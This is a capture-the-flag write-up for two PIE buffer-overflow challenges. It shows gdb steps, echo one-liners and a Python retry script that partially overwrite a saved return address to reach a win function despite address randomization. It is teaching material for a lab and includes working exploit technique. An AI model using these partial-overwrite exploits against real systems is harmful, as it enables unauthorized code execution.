
PIEs

PIEs (easy)

  1. GDB -> disas win_authed -> the address of the instruction right after the auth check is 0x237e (an unrelocated offset: before `run`, gdb shows PIE addresses relative to a base of 0)
  2. As told in the debug output, the return address from challenge() is stored 104 bytes from the start of the input buffer.

    ```shell
    # 104 bytes of filler, then the low two bytes of 0x237e in little-endian order
    echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x7e\x23" | /challenge/binary-exploitation-pie-overflow-w
    ```

Only the low two bytes of the saved return address are overwritten, so its upper six bytes (which carry the randomized PIE base) stay intact. Of the four nibbles we write, the low three are certain because the PIE base is page-aligned (its low 12 bits are zero), but the fourth least-significant one is a guess, and it will be incorrect 15 of 16 times. This is okay: we can just run the exploit a few times until it works (statistically, ~50% chance of at least one success after 11 runs and ~90% after 36).

PIEs (hard)

  1. In gdb, disas win_authed and disas main tell us (again unrelocated offsets, since the binary is not running yet):

    • The instruction after the auth check is at 0x174c
    • challenge() returns to 0x19b9 (the instruction in main right after the call)
  2. Set a breakpoint with b *challenge+158, run, and give a short string of a's as input

  3. info frame -> rbp is at 0x7ffdcf51c100
  4. x/100xg $rbp-200:
    • the input buffer starts at 0x7ffdcf51c0b0, which is rbp-0x50 = rbp-80
    • the return address is stored at rbp+0x8 = rbp+8 (the absolute address noted for it, 0x7fffd6cd0ed8, comes from a different run with a different stack base; only the offset from rbp is stable across runs)
  5. 88 a's (from rbp-80 up to rbp+8) followed by the desired two bytes (one of the 4 nibbles is a guess, so the exploit has to be run a few times):

    ```shell
    # 88 bytes of filler, then the low two bytes of 0x174c in little-endian order
    echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x4c\x17" | /challenge/binary-exploitation-pie-overflow
    ```
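The following script is an added example for both the easy and hard procedures above; it is not code from the original notes or from pwn.college. It builds the partial-overwrite payload from the offsets found in gdb, models why a two-byte write succeeds on exactly 1 of 16 runs (and when a single-byte write would need no guess at all), computes how many runs are needed for a given confidence, and retries the binary until the win marker appears. The flag prefix in `WIN_MARKER`, the injectable `run` hook, and the function names are assumptions of this example; the binary paths and offsets are the ones from the notes.

```python
#!/usr/bin/env python3
"""Partial overwrite of a saved return address in a PIE binary, plus the
retry loop the notes describe.  Added example for this writeup, not code from
the original notes or from pwn.college.  Assumptions: the challenge binary
reads the payload from stdin (as in the notes), a win prints the flag, and
WIN_MARKER is a placeholder prefix to adjust for the target."""
import math
import subprocess

WIN_MARKER = b"pwn.college{"   # assumed flag prefix; adjust for the target


def build_payload(ret_offset: int, target: int) -> bytes:
    """Filler up to the saved return address, then only the low two bytes of
    the target (little-endian).  The upper six bytes of the saved address,
    which carry the randomized PIE base, are left untouched."""
    return b"a" * ret_offset + (target & 0xFFFF).to_bytes(2, "little")


def bytes_to_write(ret_off: int, target_off: int) -> int:
    """How many low bytes of the return address must change.  The PIE base is
    page-aligned (low 12 bits zero), so bits 0..11 of a code address are the
    file offset verbatim: if the two offsets agree above bit 8, a single-byte
    write is enough and involves no guessing at all."""
    return 1 if (ret_off >> 8) == (target_off >> 8) else 2


def hits_target(base: int, ret_off: int, target_off: int) -> bool:
    """Model the two-byte write: does (base + ret_off) with its low 16 bits
    replaced by target_off's low 16 bits equal base + target_off?"""
    saved_ret = base + ret_off
    landed = (saved_ret & ~0xFFFF) | (target_off & 0xFFFF)
    return landed == base + target_off


def success_rate(ret_off: int, target_off: int) -> float:
    """Fraction of the 16 possible values of base bits 12..15 (the only
    randomized bits the two-byte write touches) for which the jump lands.
    The base prefix is a constructed sample value; only bits 12..15 matter."""
    bases = [0x5555_5555_0000 | (nib << 12) for nib in range(16)]
    return sum(hits_target(b, ret_off, target_off) for b in bases) / 16


def attempts_for(confidence: float, p_success: float = 1 / 16) -> int:
    """Smallest n with 1 - (1 - p)^n >= confidence."""
    return math.ceil(math.log(1 - confidence) / math.log(1 - p_success))


def run_until_win(argv, payload, marker=WIN_MARKER, max_tries=64, run=None):
    """Feed the payload to the process until the marker shows up in stdout.
    `run` can be injected (e.g. for testing without the binary); the default
    spawns argv with the payload on stdin."""
    if run is None:
        def run():
            return subprocess.run(argv, input=payload, capture_output=True).stdout
    for attempt in range(1, max_tries + 1):
        out = run()
        if marker in out:
            return attempt, out
    return None, b""


if __name__ == "__main__":
    # Values from the "PIEs (hard)" steps: buffer at rbp-80, ret at rbp+8.
    RET_OFF, TARGET = 0x19b9, 0x174c
    payload = build_payload(88, TARGET)
    print(f"bytes to write: {bytes_to_write(RET_OFF, TARGET)}, "
          f"per-try success: {success_rate(RET_OFF, TARGET):.4f}, "
          f"tries for 90%: {attempts_for(0.9)}")
    n, out = run_until_win(["/challenge/binary-exploitation-pie-overflow"], payload)
    print(f"won on attempt {n}:" if n else "gave up:", out)
```

For the easy variant, call `build_payload(104, 0x237e)` and point `run_until_win` at `/challenge/binary-exploitation-pie-overflow-w`. `success_rate` makes the "one nibble is a guess" statement concrete: with both offsets below 0x10000, the write lands only when bits 12..15 of the PIE base are zero, which is why no number of extra filler bytes helps and only a leak of the base would remove the guess.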